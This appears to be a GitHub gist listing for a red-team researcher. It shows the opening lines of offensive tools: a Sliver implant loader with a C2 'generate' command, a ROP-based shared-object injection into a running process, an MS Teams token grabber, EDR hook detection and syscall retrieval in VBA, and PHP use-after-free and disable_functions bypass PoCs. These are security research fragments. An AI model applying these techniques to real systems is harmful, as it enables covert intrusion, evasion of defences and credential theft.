@X-C3LL
X-C3LL / miniloader.c
Created November 12, 2023 09:58
Minimal loader for sliver
// gcc estibador.c -o estibador -pie -fPIC
// [server] sliver > generate --http https://192.168.13.37/ --os linux --arch amd64
//Refs:
//
// https://refspecs.linuxfoundation.org/elf/gabi4+/ch4.eheader.html
// binfmt_elf.c
// http://manugarg.appspot.com/aboutelfauxiliaryvectors.html
//
X-C3LL / Description.md
Last active October 19, 2023 09:29
Load a shared object inside /usr/bin/sleep via a stack hijack + ROP chain

This is just a Proof of Concept. It does:

  1. Decrypt shared object from disk
  2. Create a new memfd using memfd_create and write the shared object on it
  3. Fork and spawn /usr/bin/sleep in the child using execve with a masked name (here /this/is/a/PoC). The path to the memfd is passed via an env var
  4. The parent reads sleep's /proc/PID/mem and searches for gadgets.
  5. It also looks for the address that the nanosleep call inside /usr/bin/sleep would return to, then searches for this address in the stack
  6. It uses /proc/PID/syscall to get the return address of nanosleep syscall
  7. Craft a simple ROP chain to execute dlopen(path-to-my-memfd, RTLD_NOW)
  8. Overwrite the return address in the stack
X-C3LL / hookity.py
Created December 28, 2022 15:28
Crappy script to generate signatures to be used on memdlopen
#!/usr/bin/env python3
# Author: Juan Manuel Fernandez (@TheXC3LL)
import sys
import r2pipe
import binascii
# Edit with your needs
targets = ["sym.__GI___close_nocancel", "sym.__read_nocancel", "sym.__open_nocancel", "sym.__mmap", "sym.__GI___fstat64"]
// Obtain teams token - you can reuse it for GoMapEnum for example
// Author: Juan Manuel Fernandez (@TheXC3LL)
const puppeteer = require('puppeteer');
(async () => {
console.log("\t\tMS Teams Token Generator - @TheXC3LL\n\n");
const username = process.argv[2];
const password = process.argv[3];
console.log("[*] Using credentials: %s:%s", username, password);
X-C3LL / FreshyCalls-VBA.vba
Created September 4, 2022 23:51
Retrieving SSN for syscalling in VBA following FreshyCalls technique
' Proof of Concept: retrieving SSN for syscalling in VBA
' Author: Juan Manuel Fernandez (@TheXC3LL)
'Based on:
'https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
'https://www.crummie5.club/freshycalls/
Private Type LARGE_INTEGER
X-C3LL / uaf-leak.php
Created January 5, 2022 00:40
PoC BUG #81691 (PHP)
<?php
// BUG #81691 https://bugs.php.net/bug.php?id=81691
// POC: Memory Leak via Use-After-Free
//export USE_ZEND_ALLOC=0
X-C3LL / hookdetector.vba
Created December 7, 2020 22:31
VBA Macro to detect EDR Hooks (It's just a PoC)
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
Dim address As LongPtr
X-C3LL / estigmergio.py
Last active January 20, 2021 15:11
Infer prefixes/suffixes/common substrings inside a list of subdomains and build a dictionary
#!/usr/bin/env python3
from difflib import SequenceMatcher
import sys
def words(words_file):
    try:
        with open(words_file, "r") as file:
X-C3LL / F-Isolation.py
Created April 9, 2020 16:46
Small script to transfer files between a VDI and host using OCR & Keyboard emulation
#!/usr/bin/python
#coding: utf-8
# F-Isolation v0.1 - F**k isolated environments
# Because we hate that kind of pentests where you start at an isolated citrix where our
# clipboard is useless, we do not have internet access inside the machine and we can not
# map a local resource to upload our tools.
# OCR + Keyboard emulation FTW!
<?php
/*
If open_basedir is misconfigured it is possible to read and write /proc/self/mem. This means that a PHP script can self-patch
itself to bypass disable_functions and call system() or other dangerous functions. This technique is old, indeed you can find
a PoC by Beched (https://github.com/beched/php_disable_functions_bypass) where the open@plt address is replaced by the system@plt
address (the info is extracted parsing the PHP and libc binary).
My approach is similar in the sense of taking the advantage of /usr/proc/mem, but to achieve the bypass I overwrite the handler